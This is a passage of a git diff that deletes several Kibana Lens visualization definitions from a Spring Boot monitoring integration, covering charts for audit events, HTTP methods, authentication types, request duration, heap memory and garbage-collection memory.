"data", - "paging": { - "enabled": true, - "size": 10 - }, - "rowHeight": "auto", - "rowHeightLines": 2, - "sorting": { - "columnId": "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", - "direction": "desc" - } - } - }, - "title": "Audit Events [Logs Spring Boot]", - "visualizationType": "lnsDatatable" - }, - "coreMigrationVersion": "8.2.0", - "id": "spring_boot-a41702e0-c7f1-11ec-986a-f1e84447fd00", - "migrationVersion": { - "lens": "8.2.0" - }, - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-41dbf555-e40a-45dc-83d7-18b18263e8de", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "96d564d4-65af-4ed2-a3f6-0af7787d4b01", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-a676b6b0-ca13-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/lens/spring_boot-a676b6b0-ca13-11ec-b4b1-b57f75afa7dd.json deleted file mode 100644 index 22f3c2c59de..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-a676b6b0-ca13-11ec-b4b1-b57f75afa7dd.json +++ /dev/null 
@@ -1,119 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "12461a5e-412f-4380-9b8a-d4dfe0fa20bc": { - "columnOrder": [ - "59a904ae-9fcd-4d06-b201-09117b1981d6", - "9a043bf0-329d-4632-a095-86760550bd75" - ], - "columns": { - "59a904ae-9fcd-4d06-b201-09117b1981d6": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of http.request.method", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "9a043bf0-329d-4632-a095-86760550bd75", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "http.request.method" - }, - "9a043bf0-329d-4632-a095-86760550bd75": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "scale": "ratio", - "sourceField": "___records___" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "76ee3705-3872-45f3-8cbf-f0595d97905d", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.http_trace" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.http_trace" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "groups": [ - "59a904ae-9fcd-4d06-b201-09117b1981d6" - ], - "layerId": "12461a5e-412f-4380-9b8a-d4dfe0fa20bc", - "layerType": "data", - "legendDisplay": "show", - "metric": "9a043bf0-329d-4632-a095-86760550bd75", - "nestedLegend": true, - "numberDisplay": "percent" - } - ], - "shape": "pie" - } - }, - "title": "HTTP Request method types [Metrics Spring Boot]", - "visualizationType": "lnsPie" - }, - "coreMigrationVersion": "8.2.0", - "id": 
"spring_boot-a676b6b0-ca13-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "lens": "8.2.0" - }, - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "76ee3705-3872-45f3-8cbf-f0595d97905d", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-aa0c95c0-c7f1-11ec-986a-f1e84447fd00.json b/packages/spring_boot/kibana/lens/spring_boot-aa0c95c0-c7f1-11ec-986a-f1e84447fd00.json deleted file mode 100644 index 24d35465708..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-aa0c95c0-c7f1-11ec-986a-f1e84447fd00.json +++ /dev/null 
@@ -1,131 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "73272b0b-e1d4-4a44-9904-adaad0d24159": { - "columnOrder": [ - "2fe1f301-207a-48ff-aa1c-13aaed31b9db", - "1b8c4683-1d76-49cc-95c8-691612657847" - ], - "columns": { - "1b8c4683-1d76-49cc-95c8-691612657847": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "2fe1f301-207a-48ff-aa1c-13aaed31b9db": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Authentication Type", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "1b8c4683-1d76-49cc-95c8-691612657847", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "spring_boot.audit_events.type" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "b7a7b7d1-61be-48a9-9158-7f778b4ddaf2", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.audit_events" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.audit_events" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "groups": [ - "2fe1f301-207a-48ff-aa1c-13aaed31b9db" - ], - "layerId": "73272b0b-e1d4-4a44-9904-adaad0d24159", - "layerType": "data", - "legendDisplay": "show", - "legendMaxLines": 1, - "legendPosition": "bottom", - "metric": "1b8c4683-1d76-49cc-95c8-691612657847", - "nestedLegend": true, - "numberDisplay": "percent", - "truncateLegend": true - } - ], - "shape": "pie" - } 
- }, - "title": "Authentication type [Logs Spring Boot]", - "visualizationType": "lnsPie" - }, - "coreMigrationVersion": "8.2.0", - "id": "spring_boot-aa0c95c0-c7f1-11ec-986a-f1e84447fd00", - "migrationVersion": { - "lens": "8.2.0" - }, - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-73272b0b-e1d4-4a44-9904-adaad0d24159", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "b7a7b7d1-61be-48a9-9158-7f778b4ddaf2", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-aefe6620-ca13-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/lens/spring_boot-aefe6620-ca13-11ec-b4b1-b57f75afa7dd.json deleted file mode 100644 index 1930d582574..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-aefe6620-ca13-11ec-b4b1-b57f75afa7dd.json +++ /dev/null 
@@ -1,111 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "786d6832-6c69-42e4-916f-df6df259fad1": { - "columnOrder": [ - "575bdfd0-6d2b-4c15-98f1-760a7c18a50a", - "19721a51-8e2d-4e20-993c-b8d31c721d0f" - ], - "columns": { - "19721a51-8e2d-4e20-993c-b8d31c721d0f": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Avg time", - "operationType": "average", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "event.duration" - }, - "575bdfd0-6d2b-4c15-98f1-760a7c18a50a": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "1m" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "accessors": [ - "19721a51-8e2d-4e20-993c-b8d31c721d0f" - ], - "layerId": "786d6832-6c69-42e4-916f-df6df259fad1", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "xAccessor": "575bdfd0-6d2b-4c15-98f1-760a7c18a50a", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "19721a51-8e2d-4e20-993c-b8d31c721d0f" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "Average time taken to handle the HTTP request-response exchange [Logs Spring Boot]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.2.0", - "id": "spring_boot-aefe6620-ca13-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "lens": "8.2.0" - }, - "references": [ - { - 
"id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-786d6832-6c69-42e4-916f-df6df259fad1", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-e9033ff0-c9e9-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/lens/spring_boot-e9033ff0-c9e9-11ec-b4b1-b57f75afa7dd.json deleted file mode 100644 index a8aad2d1ac8..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-e9033ff0-c9e9-11ec-b4b1-b57f75afa7dd.json +++ /dev/null 
@@ -1,156 +0,0 @@ -{ - "attributes": { - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "31ad067d-6820-43dc-a6fd-7a32a6a121f5": { - "columnOrder": [ - "ce51dd8d-7fd5-4ebf-a835-9ffe83125746", - "07747e2a-9e75-47d8-b1d4-87c0340cf60d", - "9b2297d6-8625-44a3-a7ba-633da40efcfb" - ], - "columns": { - "07747e2a-9e75-47d8-b1d4-87c0340cf60d": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Heap Used", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "spring_boot.memory.heap.used" - }, - "9b2297d6-8625-44a3-a7ba-633da40efcfb": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Non Heap Used", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "spring_boot.memory.non_heap.used" - }, - "ce51dd8d-7fd5-4ebf-a835-9ffe83125746": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "8a86b358-6960-40ef-91ed-05c2c2e7c40f", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.memory" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.memory" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "accessors": [ - 
"07747e2a-9e75-47d8-b1d4-87c0340cf60d", - "9b2297d6-8625-44a3-a7ba-633da40efcfb" - ], - "layerId": "31ad067d-6820-43dc-a6fd-7a32a6a121f5", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "xAccessor": "ce51dd8d-7fd5-4ebf-a835-9ffe83125746" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Memory" - } - }, - "title": "Heap and non-heap memory [Metrics Spring Boot]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-11-02T08:39:23.315Z", - "id": "spring_boot-e9033ff0-c9e9-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "lens": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-31ad067d-6820-43dc-a6fd-7a32a6a121f5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "8a86b358-6960-40ef-91ed-05c2c2e7c40f", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-fae00cb0-ca04-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/lens/spring_boot-fae00cb0-ca04-11ec-b4b1-b57f75afa7dd.json deleted file mode 100644 index b2ddccc84d8..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-fae00cb0-ca04-11ec-b4b1-b57f75afa7dd.json +++ /dev/null 
@@ -1,609 +0,0 @@ -{ - "attributes": { - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "e937f0c4-f880-4837-9315-69d043a3f6b1": { - "columnOrder": [ - "94f7e582-69e9-4fe4-9111-75aaa6a3d470", - "01e713a3-bda9-4e10-b460-988900367abf", - "df8aa04a-8859-48a8-8624-e204eb09ad23", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X0", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X1", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X2", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X3", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X4", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X5", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X6", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X7", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X8", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X9", - "df8aa04a-8859-48a8-8624-e204eb09ad23X0", - "df8aa04a-8859-48a8-8624-e204eb09ad23X1", - "df8aa04a-8859-48a8-8624-e204eb09ad23X2", - "df8aa04a-8859-48a8-8624-e204eb09ad23X3", - "df8aa04a-8859-48a8-8624-e204eb09ad23X4", - "df8aa04a-8859-48a8-8624-e204eb09ad23X5", - "df8aa04a-8859-48a8-8624-e204eb09ad23X6", - "df8aa04a-8859-48a8-8624-e204eb09ad23X7", - "df8aa04a-8859-48a8-8624-e204eb09ad23X8", - "df8aa04a-8859-48a8-8624-e204eb09ad23X9" - ], - "columns": { - "01e713a3-bda9-4e10-b460-988900367abf": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Before", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - }, - "formula": 
"sum(spring_boot.gc.last_info.memory_usage.before.code_cache.used)+sum(spring_boot.gc.last_info.memory_usage.before.compressed_class_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.metaspace.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_survivor_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_survivor_space.used)", - "isFormulaBroken": false - }, - "references": [ - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X9" - ], - "scale": "ratio" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.before.code_cache.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.before.compressed_class_space.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.before.metaspace.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X3": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": 
"spring_boot.gc.last_info.memory_usage.before.ps_eden_space.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X4": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.before.ps_old_gen.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X5": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.before.ps_survivor_space.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.before.g1_eden_space.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X7": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.before.g1_old_gen.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X8": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.before.g1_survivor_space.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X9": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - { - 
"args": [ - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X0", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X1" - ], - "name": "add", - "type": "function" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X2" - ], - "name": "add", - "type": "function" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X3" - ], - "name": "add", - "type": "function" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X4" - ], - "name": "add", - "type": "function" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X5" - ], - "name": "add", - "type": "function" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X6" - ], - "name": "add", - "type": "function" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X7" - ], - "name": "add", - "type": "function" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X8" - ], - "location": { - "max": 624, - "min": 0 - }, - "name": "add", - "text": "sum(spring_boot.gc.last_info.memory_usage.before.code_cache.used)+sum(spring_boot.gc.last_info.memory_usage.before.compressed_class_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.metaspace.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_survivor_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_survivor_space.used)", - "type": "function" - } - }, - "references": [ - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X0", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X1", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X2", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X3", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X4", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X5", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X6", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X7", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X8" - ], - "scale": "ratio" - }, - "94f7e582-69e9-4fe4-9111-75aaa6a3d470": { - "dataType": "string", - "isBucketed": 
true, - "label": "Top 5 values of spring_boot.gc.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "spring_boot.gc.name" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "After", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - }, - "formula": "sum(spring_boot.gc.last_info.memory_usage.after.code_cache.used)+sum(spring_boot.gc.last_info.memory_usage.after.compressed_class_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.metaspace.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_survivor_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_survivor_space.used)", - "isFormulaBroken": false - }, - "references": [ - "df8aa04a-8859-48a8-8624-e204eb09ad23X9" - ], - "scale": "ratio" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.after.code_cache.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": 
"ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.after.compressed_class_space.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.after.metaspace.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X3": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.after.ps_eden_space.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X4": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.after.ps_old_gen.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X5": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.after.ps_survivor_space.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.after.g1_eden_space.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X7": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": 
"spring_boot.gc.last_info.memory_usage.after.g1_old_gen.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X8": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.after.g1_survivor_space.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X9": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - "df8aa04a-8859-48a8-8624-e204eb09ad23X0", - "df8aa04a-8859-48a8-8624-e204eb09ad23X1" - ], - "name": "add", - "type": "function" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X2" - ], - "name": "add", - "type": "function" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X3" - ], - "name": "add", - "type": "function" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X4" - ], - "name": "add", - "type": "function" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X5" - ], - "name": "add", - "type": "function" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X6" - ], - "name": "add", - "type": "function" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X7" - ], - "name": "add", - "type": "function" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X8" - ], - "location": { - "max": 615, - "min": 0 - }, - "name": "add", - "text": 
"sum(spring_boot.gc.last_info.memory_usage.after.code_cache.used)+sum(spring_boot.gc.last_info.memory_usage.after.compressed_class_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.metaspace.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_survivor_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_survivor_space.used)", - "type": "function" - } - }, - "references": [ - "df8aa04a-8859-48a8-8624-e204eb09ad23X0", - "df8aa04a-8859-48a8-8624-e204eb09ad23X1", - "df8aa04a-8859-48a8-8624-e204eb09ad23X2", - "df8aa04a-8859-48a8-8624-e204eb09ad23X3", - "df8aa04a-8859-48a8-8624-e204eb09ad23X4", - "df8aa04a-8859-48a8-8624-e204eb09ad23X5", - "df8aa04a-8859-48a8-8624-e204eb09ad23X6", - "df8aa04a-8859-48a8-8624-e204eb09ad23X7", - "df8aa04a-8859-48a8-8624-e204eb09ad23X8" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "8aabc9bc-b40b-4f3c-b077-c4d19cd6b477", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.gc" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.gc" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "df8aa04a-8859-48a8-8624-e204eb09ad23", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7" - ], 
- "layerId": "e937f0c4-f880-4837-9315-69d043a3f6b1",
- "layerType": "data",
- "position": "top",
- "seriesType": "line",
- "showGridlines": false,
- "splitAccessor": "94f7e582-69e9-4fe4-9111-75aaa6a3d470",
- "xAccessor": "01e713a3-bda9-4e10-b460-988900367abf"
- }
- ],
- "legend": {
- "isVisible": true,
- "legendSize": "xlarge",
- "position": "right",
- "showSingleSeries": true
- },
- "preferredSeriesType": "line",
- "tickLabelsVisibilitySettings": {
- "x": true,
- "yLeft": true,
- "yRight": true
- },
- "valueLabels": "hide",
- "valuesInLegend": true,
- "yLeftExtent": {
- "mode": "full"
- },
- "yRightExtent": {
- "mode": "full"
- },
